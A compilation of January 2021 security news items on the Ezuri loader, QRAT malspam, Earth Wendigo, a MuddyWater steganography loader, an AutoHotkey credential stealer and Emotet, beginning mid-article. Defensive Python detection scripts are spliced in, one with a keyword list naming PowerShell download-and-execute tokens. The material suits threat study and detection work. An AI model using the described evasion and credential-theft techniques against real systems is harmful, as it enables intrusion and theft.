But detection before malicious infrastructure can be used creates an opportunity to stop threat actors before they can cause damage, according to Recorded Future.

“Before a server can be used by a threat actor, it has to be acquired, either via compromise or legitimate purchase,” Recorded Future explained. “Then, the software must be installed, configurations must be tuned and files added to the server. The actors must access it via panel login, SSH or RDP protocols, and then expose the malware controller on a port to allow the data to transfer from the victim and to administer commands to infections. Only then can the server be used for malicious purposes.”


Ezuri memory loader used in Linux and Windows malware
9.1.2021 
Virus  Securityaffairs

Multiple threat actors have recently started using the Ezuri memory loader to execute malware directly in the victims’ memory.
According to researchers from AT&T’s Alien Labs, malware authors are choosing the Ezuri memory loader for their malicious codes.

The Ezuri memory loader tool allows an attacker to load and execute a payload directly in the memory of the infected machine, without writing any file to disk.

Experts pointed out that while this technique is common in Windows malware, it is rare in Linux attacks.

“The loader decrypts the malicious malware and executes it using memfd_create (as described in this blog in 2018). When creating a process, the system returns a file descriptor to an anonymous file in ‘/proc/PID/fd/’ which is visible only in the filesystem.” reads the post published by AT&T’s Alien Labs.

The loader observed by the researchers in the attacks is written in Golang and borrows the Ezuri code published on GitHub by the user guitmz in March 2019. The user describes his project as a simple Linux ELF runtime crypter; he wrote the code to demonstrate how to execute ELF binary files from memory with the memfd_create syscall.

The guitmz user also tested his code against VirusTotal to prove that it is able to avoid detection; in particular, he demonstrated that he was able to obtain a zero detection rate for a known Linux.Cephei sample once it was injected using the Ezuri code (ddbb714157f2ef91c1ec350cdf1d1f545290967f61491404c81b4e6e52f5c41f).

Upon executing the code, it asks the user for the path of the payload to be encrypted and the password to be used for the AES encryption that hides the malware within the loader. If no password is provided, the tool generates one. The packer then compiles the loader with the encrypted payload embedded in it, so that the payload can be decrypted and executed in memory once it is delivered to the targeted system.
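The memfd_create technique described above (an ELF run from an anonymous in-memory file, so nothing is written to disk) still leaves a trace a defender can hunt for: the running process's /proc/PID/exe link points at a "/memfd:" path rather than a filesystem path. The script below is an added example, not Alien Labs' or guitmz's code; the sample records are constructed, and on a real host a hit still needs triage because some legitimate runtimes also use memfd.

```python
import os
import re
from dataclasses import dataclass
from typing import Iterable, List, Optional, Tuple

# An anonymous file created with memfd_create(2) shows up in /proc/PID/exe
# (and in /proc/PID/maps) as "/memfd:<name> (deleted)". A process whose main
# executable resolves there was started from memory, not from a path on disk.
MEMFD_RE = re.compile(r"^/memfd:(?P<name>.*?)(?: \(deleted\))?$")


@dataclass
class Finding:
    pid: int
    memfd_name: str
    cmdline: str


def classify_exe_link(pid: int, exe_target: str, cmdline: str) -> Optional[Finding]:
    """Return a Finding if exe_target points at a memfd-backed executable."""
    match = MEMFD_RE.match(exe_target)
    if not match:
        return None
    return Finding(pid=pid, memfd_name=match.group("name"), cmdline=cmdline)


def scan_records(records: Iterable[Tuple[int, str, str]]) -> List[Finding]:
    """Pure function over (pid, exe_link_target, cmdline) tuples, so the logic
    can be exercised offline against constructed data."""
    findings = []
    for pid, target, cmdline in records:
        finding = classify_exe_link(pid, target, cmdline)
        if finding is not None:
            findings.append(finding)
    return findings


def collect_live_records(proc: str = "/proc") -> List[Tuple[int, str, str]]:
    """Walk /proc on a live Linux host.

    Entries we cannot read (other users' processes without privileges, or
    processes that exit mid-scan) are skipped rather than aborting the hunt.
    """
    records = []
    for entry in os.listdir(proc):
        if not entry.isdigit():
            continue
        pid = int(entry)
        try:
            target = os.readlink(f"{proc}/{pid}/exe")
            with open(f"{proc}/{pid}/cmdline", "rb") as fh:
                raw = fh.read()
        except OSError:
            continue
        cmdline = raw.replace(b"\0", b" ").decode(errors="replace").strip()
        records.append((pid, target, cmdline))
    return records


# Constructed sample of what collect_live_records() might return.
SAMPLE_RECORDS = [
    (1, "/usr/lib/systemd/systemd", "/sbin/init"),
    (4242, "/memfd:payload (deleted)", "./loader"),
    (4243, "/usr/bin/python3", "python3 app.py"),
    (5000, "/memfd: (deleted)", "/tmp/x"),
]

if __name__ == "__main__":
    for f in scan_records(collect_live_records()):
        print(f"pid={f.pid} memfd={f.memfd_name!r} cmdline={f.cmdline}")
```

Run as root to see every process; unprivileged, /proc/PID/exe is only readable for your own processes.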

In August, the user ‘TMZ,’ likely associated with ‘guitmz,’ posted the same code on a forum where members shared malware.

Researchers from AT&T Alien Labs have identified several malware authors leveraging the Ezuri loader in the last few months; one of them is a threat actor tracked as TeamTNT, which has been active since at least 2020.

The TeamTNT botnet is a crypto-mining malware operation that has been active since April and targets Docker installs; it is the first cryptomining bot that steals AWS credentials.

Experts noticed that the group also used an Ezuri loader that is similar to the original one.
“In October 2020, Palo Alto Networks Unit42 identified new variants of the cryptomining malware used by TeamTNT named “Black-T.” This sample first installs three network scanners, and then inspects memory in an attempt to retrieve any type of credentials located in the memory. Additionally, Unit42 identified several German-language strings in some of the TNT scripts.” continues the report.

“The last sample identified by Palo Alto Networks Unit42 is actually an Ezuri loader. The decrypted payload is an ELF file packed with UPX, which is a known sample from TeamTNT, first seen in June 2020 (e15550481e89dbd154b875ce50cc5af4b49f9ff7b837d9ac5b5594e5d63966a3).”

In conclusion, the use of this packer is popular among malware authors (vxers), as is the technique it relies on to load ELF binaries into memory. Ezuri allows malware authors to improve their operations by increasing the evasion capabilities of known payloads.
“Several malware authors have been using an open source Golang tool to act as a malware loader, using a known technique to load the ELF binaries into memory and avoid using easy-to-detect files on disk.” concludes the report. “The authors use the open source tool Ezuri, to load its previously seen payloads and avoid antivirus detections on the file.”


It’s Not the Trump Sex Tape, It’s a RAT
7.1.2021 
Virus  Threatpost

Criminals are using the end of the Trump presidency to deliver a new remote-access trojan (RAT) variant disguised as a sex video of the outgoing POTUS, researchers report.

As outgoing President Donald Trump continues to dominate headlines, cybercriminals have decided to horn in on the much-gossiped-about — and yet to materialize — Trump sex tape as a lure for malware delivery.

A campaign has been uncovered that labels a malware downloader with the filename “TRUMP_SEX_SCANDAL_Video,” according to a new report from Trustwave researchers. It’s being spread via malicious links in emails.

If clicked, the links don’t take the user to a salacious video, but instead install QRAT, providing criminals with total remote access of an infected system.

QRAT
First discovered in 2015, the Quaverse Remote Access Trojan (QRAT) is a Java-based remote access trojan (RAT) supercharged by plug-ins from Quaverse, Trustwave explained.

Starting last August, Trustwave researchers reported seeing an uptick in phishing scams trying to push QRAT. This latest phishing attempt is interesting, though, according to Trustwave researcher Diana Lopera, because the subject line and the filename were unrelated.
“The email, with the subject “GOOD LOAN OFFER!!,” at first glance, looks like a usual investment scam,” Lopera said in the report about the find. “No obfuscation in the email headers or body is found. Interestingly, attached to the email is an archive containing a Java Archive (JAR) file called “TRUMP_SEX_SCANDAL_VIDEO.jar.”

Lopera added that recent headlines surrounding the election provided plenty of cover for malicious actors to conduct their scams.

“We suspect that the bad guys are attempting to ride the frenzy brought about by the recently concluded presidential elections, since the filename they used on the attachment is totally unrelated to the email’s theme,” Lopera said.

QRAT Variants
This QRAT is notable because it has several differences from its predecessors, Lopera explained.

“This threat has been significantly enhanced over the past few months since we first examined it,” Lopera said. “To achieve the same end goal, which is to infect the system with a QNode RAT, the JAR file downloader characteristics and behavior were improved.”

In this version the code is Base64-encoded; the modules are hidden with the Allatori Obfuscator; the victim's network information is retrieved from the service “hxxps://wtfismyip[.]com”; and, finally, the password recovery also supports Chrome, Firefox, Thunderbird and Outlook, the report explained.

“The malicious code of this downloader is split up among…numbered files, along with some junk data that were added to them.” Lopera wrote.

The latest .JAR variant also includes a scam Microsoft ISC license, which serves up a message telling the user the .JAR file is being run for remote penetration testing, the report said.

“Upon the execution of the file “TRUMP_SEX_SCANDAL_VIDEO.jar”, a copy of it is created and then executed from the %temp% folder,” Lopera said. “Then, a GUI informing the victim that the malicious JAR file is a remote access software used for penetration testing is launched. The malicious behaviors of this sample start to manifest once the button ‘Ok, I know what I am doing’ is clicked,” Lopera said.

Another difference between this version and previous known .JAR files is a missing string of code.

“Third, the string “qnodejs” which previously identified the files associated with this threat, is not in this variant,” she observed.

Earlier versions of the .JAR file contained information about the QHub service subscription necessary to communicate with the C2 server, the report said.

“The information about the QHub service subscription user we observed in the earlier variant is no longer contained in the JAR file,” Lopera said.

‘Amateurish’ Attempt
To protect systems against this latest QRAT variant, Lopera advises that email administrators should block .JAR files at security gateways.

“While the attachment payload has some improvements over previous versions, the email campaign itself was rather amateurish, and we believe that the chance this threat will be delivered successfully is higher if only the email was more sophisticated,” Lopera wrote. “The spamming out of malicious JAR files, which often lead to RATs such as this, is quite common.”


Fake Trump sex video used to spread QNode RAT
7.1.2021 
Virus  Securityaffairs

Researchers uncovered a malspam campaign that spreads the QNode remote access Trojan (RAT) using a fake Trump sex scandal video as bait.
Security experts from Trustwave uncovered a malspam campaign that is delivering the QNode remote access Trojan (RAT) using a fake Trump sex scandal video as bait.

The spam messages use the subject “GOOD LOAN OFFER!!” and have attached to the email an archive containing a Java Archive (JAR) file called “TRUMP_SEX_SCANDAL_VIDEO.jar”.

QNode RAT
Upon executing the attachment, the malicious code attempts to install the Qnode RAT on the recipient’s machine.

“While reviewing our spam traps, a particular campaign piqued our interest primarily because the attachment to the email does not coincide with the theme of the email body.” states the post published by the experts. “We suspect that the bad guys are attempting to ride the frenzy brought about by the recently concluded Presidential elections since the filename they used on the attachment is totally unrelated to the email’s theme.”

The downloader distributed in this malspam campaign appears to be a variant of the QRAT downloader that was discovered by Trustwave researchers in August.

Experts highlighted some other similarities with the older variants such as the obfuscation of the JAR file with the Allatori Obfuscator, the support for Windows OS only, and the fact that the installer of Node.Js is retrieved from the official website nodejs.org.

The QRAT variant continues to have multi-stage downloaders. The first downloader is the JAR file used as an attachment in the spam message.

As detailed in the August report published by Trustwave, the first downloader has two major tasks, it first sets up the Node.Js platform onto the system, then downloads and executes the second-stage downloader.

The second-stage downloader, named “wizard.js”, fetches and executes the Qnode RAT from a C2 server; it is also used to achieve persistence on the infected system.
The new variant employed in the new campaign has the following notable new features and changes:

this JAR sample is significantly larger than the one used in past campaigns;
the threat actor behind this campaign added a GUI and a supposed Microsoft ISC License to the JAR’s code;
this variant does not use the string “qnodejs“ (to evade detection), and the downloader code was split up into different buffers inside the JAR;
when downloading the next-stage malware, only the argument “–hub-domain” is required when communicating with the command-and-control servers (C&Cs);
the JAR file downloads a file named “boot.js” and saves it at %temp%\_qhub_node_{random}.
QRAT supports multiple RAT features, including obtaining system information, performing file operations, and acquiring credentials of certain applications. This variant supports multiple applications, including Chrome, Firefox, Thunderbird, and Outlook.

“This threat has been significantly enhanced over the past few months since we first examined it. To achieve the same end goal, which is to infect the system with a QNode RAT, the JAR file downloader characteristics and behavior were improved.” concludes the report.

“While the attachment payload has some improvements over previous versions, the email campaign itself was rather amateurish, and we believe that the chance this threat will be delivered successfully is higher if only the email was more sophisticated.”


'Earth Wendigo' Hackers Exfiltrate Emails Through JavaScript Backdoor
7.1.2021 
Virus  Securityweek

A newly identified malware attack campaign has been exfiltrating emails from targeted organizations using a JavaScript backdoor injected into a webmail system widely used in Taiwan.

According to an advisory from Trend Micro, the attacks are linked to Earth Wendigo, a threat actor that does not appear to be affiliated with known hacking groups.

Starting May 2019, Trend Micro said Earth Wendigo has been targeting multiple organizations, including government entities, research institutions, and universities in Taiwan.

The attacks include the use of spear-phishing emails to various targets, including politicians and activists linked to Tibet, the Uyghur region, or Hong Kong.

As an initial attack vector, the group used spear-phishing emails containing obfuscated JavaScript code meant to load malicious scripts from an attacker-controlled remote server.

These scripts were designed to steal browser cookies and webmail session keys, propagate the infection by appending code to the victim’s email signature, and exploit a cross-site scripting (XSS) vulnerability in the webmail server for JavaScript injection.

The exploited XSS vulnerability resides in the webmail system’s shortcut feature and allows the attackers to add a shortcut with a crafted payload, replacing parts of the webmail system’s page with malicious JavaScript code.

Trend Micro reported that the XSS vulnerability was fixed in January 2020, meaning that only organizations that haven’t updated to the latest version of the webmail server remain exposed.

Should this method fail, the attackers’ script registers malicious JavaScript code to the server’s Service Worker (a programmable network proxy inside the browser), so that it could intercept and manipulate HTTPS requests, hijack login credentials, and add malicious scripts to the webmail page.

After performing the XSS injection or adding code to the Service Worker, which ensures that the malicious script is constantly loaded and executed, the attackers proceed to exfiltrate emails by establishing a WebSocket connection to an injected JavaScript backdoor.

The backdoor reads emails on the server and sends their content and attachments to the attacker’s WebSocket server.

In addition to targeting webmail servers, Earth Wendigo also uses Python malware compiled as Windows executables, which were found to be shellcode loaders for code likely from Cobalt Strike.

Some of the Python samples are backdoors that request additional Python code from the command and control (C&C) server. However Trend Micro couldn’t determine the purpose of the fetched code.


Hackers Using Fake Trump's Scandal Video to Spread QNode Malware
7.1.2021 
Virus  Thehackernews
Cybersecurity researchers today revealed a new malspam campaign that distributes a remote access Trojan (RAT) by purporting to contain a sex scandal video of U.S. President Donald Trump.

The emails, which carry the subject line "GOOD LOAN OFFER!!," come attached with a Java archive (JAR) file called "TRUMP_SEX_SCANDAL_VIDEO.jar," which, when downloaded, installs Qua or Quaverse RAT (QRAT) onto the infiltrated system.

"We suspect that the bad guys are attempting to ride the frenzy brought about by the recently concluded Presidential elections since the filename they used on the attachment is totally unrelated to the email's theme," Trustwave's Senior Security Researcher Diana Lopera said in a write-up published today.

The latest campaign is a variant of the Windows-based QRAT downloader Trustwave researchers discovered in August.

The infection chain starts with a spam message containing an embedded attachment or a link pointing to a malicious zip file, either of which retrieves a JAR file ("Spec#0034.jar") that's scrambled using the Allatori Java obfuscator.


This first stage downloader sets up the Node.Js platform onto the system and then downloads and executes a second-stage downloader called "wizard.js" that's responsible for achieving persistence and fetching and running the Qnode RAT ("qnode-win32-ia32.js") from an attacker-controlled server.

QRAT is a typical remote access Trojan with various features, including obtaining system information, performing file operations, and acquiring credentials from applications such as Google Chrome, Firefox, Thunderbird, and Microsoft Outlook.

What's changed this time around is the inclusion of a new pop-up alert that informs the victim that the JAR being run is a remote access software used for penetration testing. This also means the sample's malicious behavior only begins to manifest once the user clicks the "Ok, I know what I am doing." button.


"This pop-up is a little odd and is perhaps an attempt to make the application look legitimate, or deflect responsibility from the original software authors," Lopera noted.

Furthermore, the malicious code of the JAR downloader is split up into different randomly numbered buffers in an attempt to evade detection.

Other changes include an overall increase in the JAR file size and the elimination of the second-stage downloader in favor of an updated malware chain that immediately fetches the QRAT payload now called "boot.js."

For its part, the RAT has received its own share of updates, with the code now wrapped in base64 encoding, in addition to taking charge of persisting on the target system via a VBS script.

"This threat has been significantly enhanced over the past few months since we first examined it," Lopera concluded, urging administrators to block the incoming JARs in their email security gateways.

"While the attachment payload has some improvements over previous versions, the email campaign itself was rather amateurish, and we believe that the chance this threat will be delivered successfully is higher if only the email was more sophisticated."


New alleged MuddyWater attack downloads a PowerShell script from GitHub
5.1.2021 
Virus  Securityaffairs

A security researcher spotted a new piece of malware that leverages weaponized Word documents to download a PowerShell script from GitHub.
The security researcher Arkbird discovered a new piece of malware that uses weaponized Word documents to download a PowerShell script from GitHub.

This PowerShell script is also used by threat actors to download a legitimate image file from image hosting service Imgur and decode an embedded Cobalt Strike script to target Windows systems.

The researcher Arkbird published technical details of the malware that uses steganography to hide the malicious code in the image.

Arkbird pointed out that the sample could be part of the Muddywater APT’s arsenal.

The attack chain starts with the execution of a macro embedded in a legacy Microsoft Word (*.doc) file, a technique that was employed by the Muddywater group in its attacks.

Upon executing the embedded macro, it launches powershell.exe and attempts to execute a PowerShell script hosted on GitHub (archived).

The PowerShell script is composed of a single line that downloads a PNG file from the image hosting service Imgur.

The PowerShell script analyzes a set of pixel values of the image to prepare the next-stage payload.

“As observed by BleepingComputer and shown below, the payload calculation algorithm runs a foreach loop to iterate over a set of pixel values within the PNG image and performs specific arithmetic operations to obtain functional ASCII commands.” reported Ax Sharma on Bleeping Computer.

[Figure: the macro loads PowerShell; the PowerShell script uses the image to calculate the payload. Source: BleepingComputer]
Once decoded, the script reveals a Cobalt Strike payload that allows attackers to deploy “beacons” on compromised Windows machines.
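The pixel-walking decode described above, reproduced as an added analyst-side example (my code, not the sample's or BleepingComputer's). It assumes the simplest such scheme, the low nibble of the red and green channels of each pixel forming one payload byte with a NUL terminator, as a stand-in for the unpublished MuddyWater arithmetic; pixel tuples are what an image library such as Pillow's Image.getdata() returns, and the sample pixels are constructed.

```python
# Added example (not from the article or the analysed sample). Rebuilds hidden bytes from
# pixel values the way the described loop does: walk pixels, apply arithmetic, collect ASCII.
# The concrete scheme (low nibble of R and of G form one byte, NUL terminates) is an assumed
# stand-in modelled on public PowerShell image-stego tooling, not the MuddyWater arithmetic.
from typing import Iterable, Tuple

Pixel = Tuple[int, int, int]  # (R, G, B), e.g. as yielded by PIL's Image.getdata()

def recover_payload(pixels: Iterable[Pixel], max_len: int = 1 << 20) -> bytes:
    """Each pixel yields ((R & 0x0F) << 4) | (G & 0x0F); stop at NUL or max_len."""
    out = bytearray()
    for r, g, _b in pixels:
        byte = ((r & 0x0F) << 4) | (g & 0x0F)
        if byte == 0:
            break
        out.append(byte)
        if len(out) >= max_len:
            break
    return bytes(out)

SCRIPT_MARKERS = ("iex", "invoke-expression", "frombase64string", "downloadstring", "virtualalloc")

def looks_like_script(payload: bytes) -> bool:
    """Triage heuristic: printable ASCII carrying PowerShell/loader tokens is worth escalating."""
    try:
        text = payload.decode("ascii")
    except UnicodeDecodeError:
        return False
    if any(not (c.isprintable() or c in "\r\n\t") for c in text):
        return False
    lowered = text.lower()
    return any(m in lowered for m in SCRIPT_MARKERS)

# Constructed sample "image": flat grey (0x80) pixels whose low nibbles spell
# "IEX(x)" followed by a NUL terminator, then untouched filler pixels.
SAMPLE_PIXELS = [
    (0x84, 0x89, 0x80),  # 'I' = 0x49
    (0x84, 0x85, 0x80),  # 'E' = 0x45
    (0x85, 0x88, 0x80),  # 'X' = 0x58
    (0x82, 0x88, 0x80),  # '(' = 0x28
    (0x87, 0x88, 0x80),  # 'x' = 0x78
    (0x82, 0x89, 0x80),  # ')' = 0x29
    (0x80, 0x80, 0x80),  # NUL terminator
    (0x80, 0x80, 0x80), (0x80, 0x80, 0x80),  # filler
]

def triage_image(pixels: Iterable[Pixel]) -> dict:
    """Recover whatever is hidden and say whether it deserves a closer look."""
    payload = recover_payload(pixels)
    return {"bytes": len(payload), "suspicious": looks_like_script(payload)}
```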

The shellcode uses an EICAR string to evade detection by tricking defenses into thinking that the code is part of a security test.

The EICAR Anti-Virus Test File, or EICAR test file, is a computer file that was developed by the European Institute for Computer Antivirus Research (EICAR) and Computer Antivirus Research Organization (CARO), to test the response of computer antivirus (AV) programs. Instead of using real malware, which could cause real damage, this test file allows people to test anti-virus software without having to use a real computer virus.
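The EICAR evasion described above, as an added example that is not from the article or the analysed sample: a Python check that accepts only a file shaped like the official EICAR test file and sends anything else carrying the marker to full analysis. The sample blobs are constructed.

```python
# Added example, not from the article: tells a genuine EICAR test file apart from a
# binary that merely embeds the EICAR string, the trick attributed to the shellcode
# above. Rules follow the published EICAR definition: the 68-byte string at offset 0,
# optionally followed only by whitespace, with the whole file no larger than 128 bytes.
EICAR = b"X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
MARKER = b"EICAR-STANDARD-ANTIVIRUS-TEST-FILE"

def classify_eicar(data: bytes) -> str:
    """'test-file': the real thing; 'embedded': marker inside other content; 'none'."""
    if data.startswith(EICAR) and len(data) <= 128 and not data[len(EICAR):].strip():
        return "test-file"
    if MARKER in data:
        return "embedded"
    return "none"

def exempt_from_analysis(data: bytes) -> bool:
    """Only a true test file may be treated as harmless 'just EICAR'. Anything else
    carrying the marker (for example shellcode) must go through full analysis."""
    return classify_eicar(data) == "test-file"

# Constructed samples: a clean test file, one with a trailing newline, a fake
# PE-like blob that smuggles the string among other bytes, an over-long file, and noise.
SAMPLES = {
    "plain": EICAR,
    "trailing_ws": EICAR + b"\r\n",
    "embedded_in_blob": b"MZ" + b"\x90" * 62 + EICAR + b"\xcc" * 48,
    "too_long": EICAR + b" " * 100,
    "benign": b"hello world",
}

def triage(samples=SAMPLES) -> dict:
    """Classify every sample; the dict is what a scanner policy would act on."""
    return {name: classify_eicar(blob) for name, blob in samples.items()}
```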
The payload receives instructions from the C2 via a WinINet module.

The researcher noted that the domain used as C2 was registered on December 20 and is no longer active, while the script was uploaded to the GitHub account on December 24.


Additional details about this attack, including Indicators of Compromise (IOCs) and YARA rules, are available in the post published by Bleeping Computer.


AutoHotkey-based credential stealer targets banks in the US and Canada
2.1.2021 
Virus  Securityaffairs

Experts spotted a new credential stealer written in the AutoHotkey (AHK) scripting language that is targeting US and Canadian bank customers.
Security experts from Trend Micro have discovered a new credential stealer written in the AutoHotkey (AHK) scripting language that is targeting US and Canadian bank customers as part of an ongoing campaign that began in early 2020.

AutoHotkey is an open-source scripting language for Windows that provides easy keyboard shortcuts or hotkeys, fast macro creation, and software automation. AHK allows users to create a “compiled” .EXE with their code in it.

The campaign leverages a multi-stage infection chain that starts with a weaponized Excel file.
The malware infection consists of multiple stages that start with a malicious Excel file. The Office file contains an AHK script compiler executable, a malicious AHK script file, and a Visual Basic for Applications (VBA) AutoOpen macro.

The macro drops and executes the downloader client script (“adb.ahk”) via a legitimate portable AHK script compiler executable (“adb.exe”).

“The dropped adb.exe and adb.ahk play critical roles in this infection. The adb.exe is a legitimate portable AHK script compiler, and its job is to compile and execute the AHK script at a given path. By default (with no parameter), this executable executes a script with the same name in the same directory.” reads the analysis published by Trend Micro. “The dropped AHK script is a downloader client that is responsible for achieving persistence, profiling victims, and downloading and executing the AHK script on a victim system.”

The downloader client script was also used to achieve persistence, profile victims, and download and run additional AHK scripts from the C2.
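The adb.exe/adb.ahk behaviour described above, turned into an added detection example (my code, not Trend Micro's): it resolves which script a portable AHK compiler will run and flags a renamed interpreter started by an Office application. Event field names, paths and the "AutoHotkey.exe" original-filename value are assumptions, and the events are constructed.

```python
# Added example (not Trend Micro's code): flags process-creation events matching the
# chain described above: an Office macro starts a renamed portable AutoHotkey compiler
# that, given no argument, runs the .ahk file of the same name beside it. Event field
# names and the "AutoHotkey.exe" original-filename value are assumptions.
from pathlib import PureWindowsPath
from typing import Dict, List
OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\downloads\\")

def _argv(command_line: str) -> List[str]:
    """Minimal Windows-style split: honours a quoted first token, then whitespace."""
    cl = command_line.strip()
    if cl.startswith('"'):
        end = cl.find('"', 1)
        return [cl[1:end]] + cl[end + 1:].split()
    return cl.split()

def resolved_script(image: str, command_line: str) -> str:
    """First argument if given, else <same dir>\\<same stem>.ahk (the default the analysis notes)."""
    exe = PureWindowsPath(image)
    args = _argv(command_line)[1:]
    if not args:
        return str(exe.with_suffix(".ahk"))
    p = PureWindowsPath(args[0])
    return str(p if p.is_absolute() else exe.parent / p)

def assess(event: Dict[str, str]) -> List[str]:
    """Reasons the event deserves a look; an empty list means it does not."""
    reasons = []
    if "autohotkey" not in event.get("original_file_name", "").lower():
        return reasons  # not the AHK interpreter at all
    image = PureWindowsPath(event["image"])
    if image.stem.lower() != PureWindowsPath(event["original_file_name"]).stem.lower():
        reasons.append(f"renamed AutoHotkey interpreter ({image.name})")
    if PureWindowsPath(event.get("parent_image", "")).name.lower() in OFFICE_PARENTS:
        reasons.append("spawned by an Office application")
    if any(tok in str(image).lower() for tok in USER_WRITABLE):
        reasons.append("interpreter runs from a user-writable path")
    if reasons:
        reasons.append("script: " + resolved_script(event["image"], event.get("command_line", "")))
    return reasons
# Constructed events modelled on the adb.exe / adb.ahk pair from the analysis.
SAMPLE_EVENTS = [
    {"parent_image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Users\alice\AppData\Roaming\adb.exe",
     "original_file_name": "AutoHotkey.exe", "command_line": "adb.exe"},
    {"parent_image": r"C:\Windows\explorer.exe", "image": r"C:\Program Files\AutoHotkey\AutoHotkey.exe",
     "original_file_name": "AutoHotkey.exe",
     "command_line": r'"C:\Program Files\AutoHotkey\AutoHotkey.exe" C:\Users\alice\Documents\hotkeys.ahk'},
]
```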

Trend Micro’s telemetry allowed tracking C2 servers that are in the US, the Netherlands, and Sweden.

The info-stealer doesn’t receive commands directly from the C&C server; instead, it downloads and executes AHK scripts to perform different actions.

“For command execution, the malware accepts various AHK scripts for different tasks per victim and executes these using the same C&C URL (instead of implementing all modules in one file and accepting the command to execute them).” continues the analysis. “By doing this, the attacker can decide to upload a specific script to achieve customized tasks for each user or group of users. This also prevents the main components from being revealed publicly, specifically to other researchers or to sandboxes.”

The credential stealer targets multiple browsers, including Google Chrome, Microsoft Edge, and Opera, then exfiltrates stolen info to the C&C server in plaintext via an HTTP POST request.

Experts noticed that the delivered AHK scripts contained instructions in Russian on how to use the scripts, a circumstance that suggests the threat actor behind the attacks is a “hack-for-hire.”

“By using a scripting language that lacks a built-in compiler within a victim’s operating system, loading malicious components to achieve various tasks separately, and changing the C&C server frequently, the attacker has been able to hide their intention from sandboxes,” the researchers conclude.


Emotet campaign hits Lithuania’s National Public Health Center and several state institutions
1.1.2021 
Virus  Securityaffairs

An Emotet campaign has hit Lithuania: the malware has infected systems at the National Center for Public Health (NVSC) and several municipalities.
A large-scale Emotet campaign has hit Lithuania; the malware infected the networks of Lithuania’s National Center for Public Health (NVSC) and several municipalities.

“The National Cyber Security Center under the Ministry of National Defense recorded a large number of virus-infected e-mails addressed to several state institutions. It is currently known that Trojan.Emotet virus-infected emails have been received by several municipalities and the National Center for Public Health (NVSC).” reads the alert published by the NVSC.

The alert states that the Emotet malware infected the computers, which then began sending out fake emails or engaging in other types of malicious activity.

The malicious emails sent by the NVSC’s infected computers were received by the representatives of the Government of the Republic of Lithuania, ministries, as well as researchers that were contacted by the national center during epidemiological diagnostics.

The Emotet campaign uses malicious emails that attempt to trick recipients into opening the zipped archive with the password included in the message.

“We warn you that not all computer viruses can be intercepted by security systems used by organizations, because malicious code is distributed in various ways, such as archived, password-protected, and the password itself is written in a letter. Emails accessed in this way require user action: open the file, unzip it with a password. Therefore, we recommend that all e-mail system operators specify their security rules and filters,” says Rytis Rainys, Director of NKSC.

In response to the infections, the NVSC has temporarily shut down its e-mail systems.

NVSC IT staff is cleaning infected systems and restoring the operations with the help of the experts from the Central State Telecommunications Center and the National Cyber Security Center.

The security advisory states that this is the second large Emotet campaign to hit Lithuania this year; the first wave of Emotet emails was recorded in October.

Emotet came back on Christmas Eve: after two months of silence, its cybercrime operators are sending out spam messages to deliver the infamous TrickBot Trojan.

According to experts at Cofense, the recent Emotet campaign uses updated payloads and is targeting over 100,000 recipients per day.

The Emotet banking Trojan has been active at least since 2014; the botnet is operated by a threat actor tracked as TA542. In mid-August, the malware was employed in a fresh COVID-19-themed spam campaign.

Recent spam campaigns used messages with malicious Word documents, or links to them, pretending to be an invoice, shipping information, COVID-19 information, resumes, financial documents, or scanned documents.

The infamous banking Trojan is also used to deliver other malicious code, such as the TrickBot and QBot Trojans, or ransomware such as Conti (via TrickBot) or ProLock (via QBot).

Emotet is modular malware; its operators can develop new Dynamic Link Libraries to extend its capabilities.

In October, the Cybersecurity and Infrastructure Security Agency (CISA) issued an alert to warn of a surge of Emotet attacks that have targeted multiple state and local governments in the U.S. since August.

While in October the botnet was mainly using TrickBot, Qakbot and ZLoader as secondary payloads, in the current campaign Cofense researchers observed TrickBot.